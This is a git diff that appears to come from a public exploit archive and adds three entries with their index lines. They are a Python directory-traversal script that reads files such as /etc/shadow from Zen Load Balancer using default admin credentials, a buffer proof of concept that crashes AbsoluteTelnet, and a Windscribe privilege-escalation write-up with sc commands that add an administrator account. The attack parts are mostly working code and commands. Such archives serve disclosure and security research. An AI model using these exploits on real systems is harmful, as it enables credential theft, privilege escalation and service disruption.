diff --git a/exploits/cgi/webapps/48308.py b/exploits/cgi/webapps/48308.py
new file mode 100755
index 000000000..5ce0b9588
--- /dev/null
+++ b/exploits/cgi/webapps/48308.py
@@ -0,0 +1,31 @@
+# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
+# Date: 2020-04-10
+# Exploit Author: Basim Alabdullah
+# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
+# Version: 3.10.1
+# Tested on: Debian8u2
+#
+# Technical Details:
+# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
+# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
+# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
+#
+# Impact:
+# --------
+# Successful exploitation could allow an attacker to obtain sensitive
+# information.
+
+import requests
+import sys
+
+if len(sys.argv) <2:
+    print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
+    sys.exit(-1)
+else:
+    files=sys.argv[2]
+    url=sys.argv[1]    
+    with requests.session() as s:
+        urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
+        response = s.get(urlz, auth=('admin', 'admin'), verify=False)
+        txt=response.text
+        print(response.text)
\ No newline at end of file
diff --git a/exploits/windows/dos/48305.py b/exploits/windows/dos/48305.py
new file mode 100755
index 000000000..0771d435c
--- /dev/null
+++ b/exploits/windows/dos/48305.py
@@ -0,0 +1,22 @@
+# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-05-02
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
+# Tested Version: 11.12
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py
+# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard
+# 3.- Open AbsoluteTelnet
+# 4.- Select "new connection file", "Connection", "SSH1", "Use last username"
+# 5.- In "username" field paste Clipboard
+# 6.- Select "OK"
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("absolutetelnet_username_SSH1.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48306.txt b/exploits/windows/local/48306.txt
new file mode 100644
index 000000000..5f1850679
--- /dev/null
+++ b/exploits/windows/local/48306.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
+# Date: 2020-04-10
+# Exploit Author: MgThuraMoeMyint
+# Vendor Homepage: https://windscribe.com
+# Version: v1.83 Build 20
+# Tested on: Windows 10, version 1909
+
+In windscribe v1.83 , there is a service via windscribe that every
+authenticated user can modify.
+
+C:\Users\mgthura>sc qc WindscribeService
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: WindscribeService
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : WindscribeService
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+
+That shows that running as Local System this means that the
+BINARY_PATH_NAME parameter can be modified to execute any command on
+the system.
+I'll change binary_path_name with a command that add a user to
+administrators group , so it will be
+
+C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup
+administrators pentest /add"
+[SC] ChangeServiceConfig SUCCESS
+
+C:\Users\mgthura>sc stop WindscribeService
+
+SERVICE_NAME: WindscribeService
+TYPE : 10 WIN32_OWN_PROCESS
+STATE : 3 STOP_PENDING
+(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
+WIN32_EXIT_CODE : 0 (0x0)
+SERVICE_EXIT_CODE : 0 (0x0)
+CHECKPOINT : 0x4
+WAIT_HINT : 0x0
+
+C:\Users\mgthura>sc start WindscribeService
+[SC] StartService FAILED 1053:
+The service did not respond to the start or control request in a timely fashion.
+
+Restarting service will cause the service to fail as the binary path
+would not point into the actual executable of the service.
+However the command will be executed successfully and the user will be
+added to the local administrators group.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 600baaeaa..558ffa2fb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6702,6 +6702,7 @@ id,file,description,date,author,type,platform,port
 48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
 48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux,
 48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows,
+48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11024,6 +11025,7 @@ id,file,description,date,author,type,platform,port
 48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,
 48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
+48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42547,3 +42549,4 @@ id,file,description,date,author,type,platform,port
 48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,
 48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php,
 48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware,
+48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,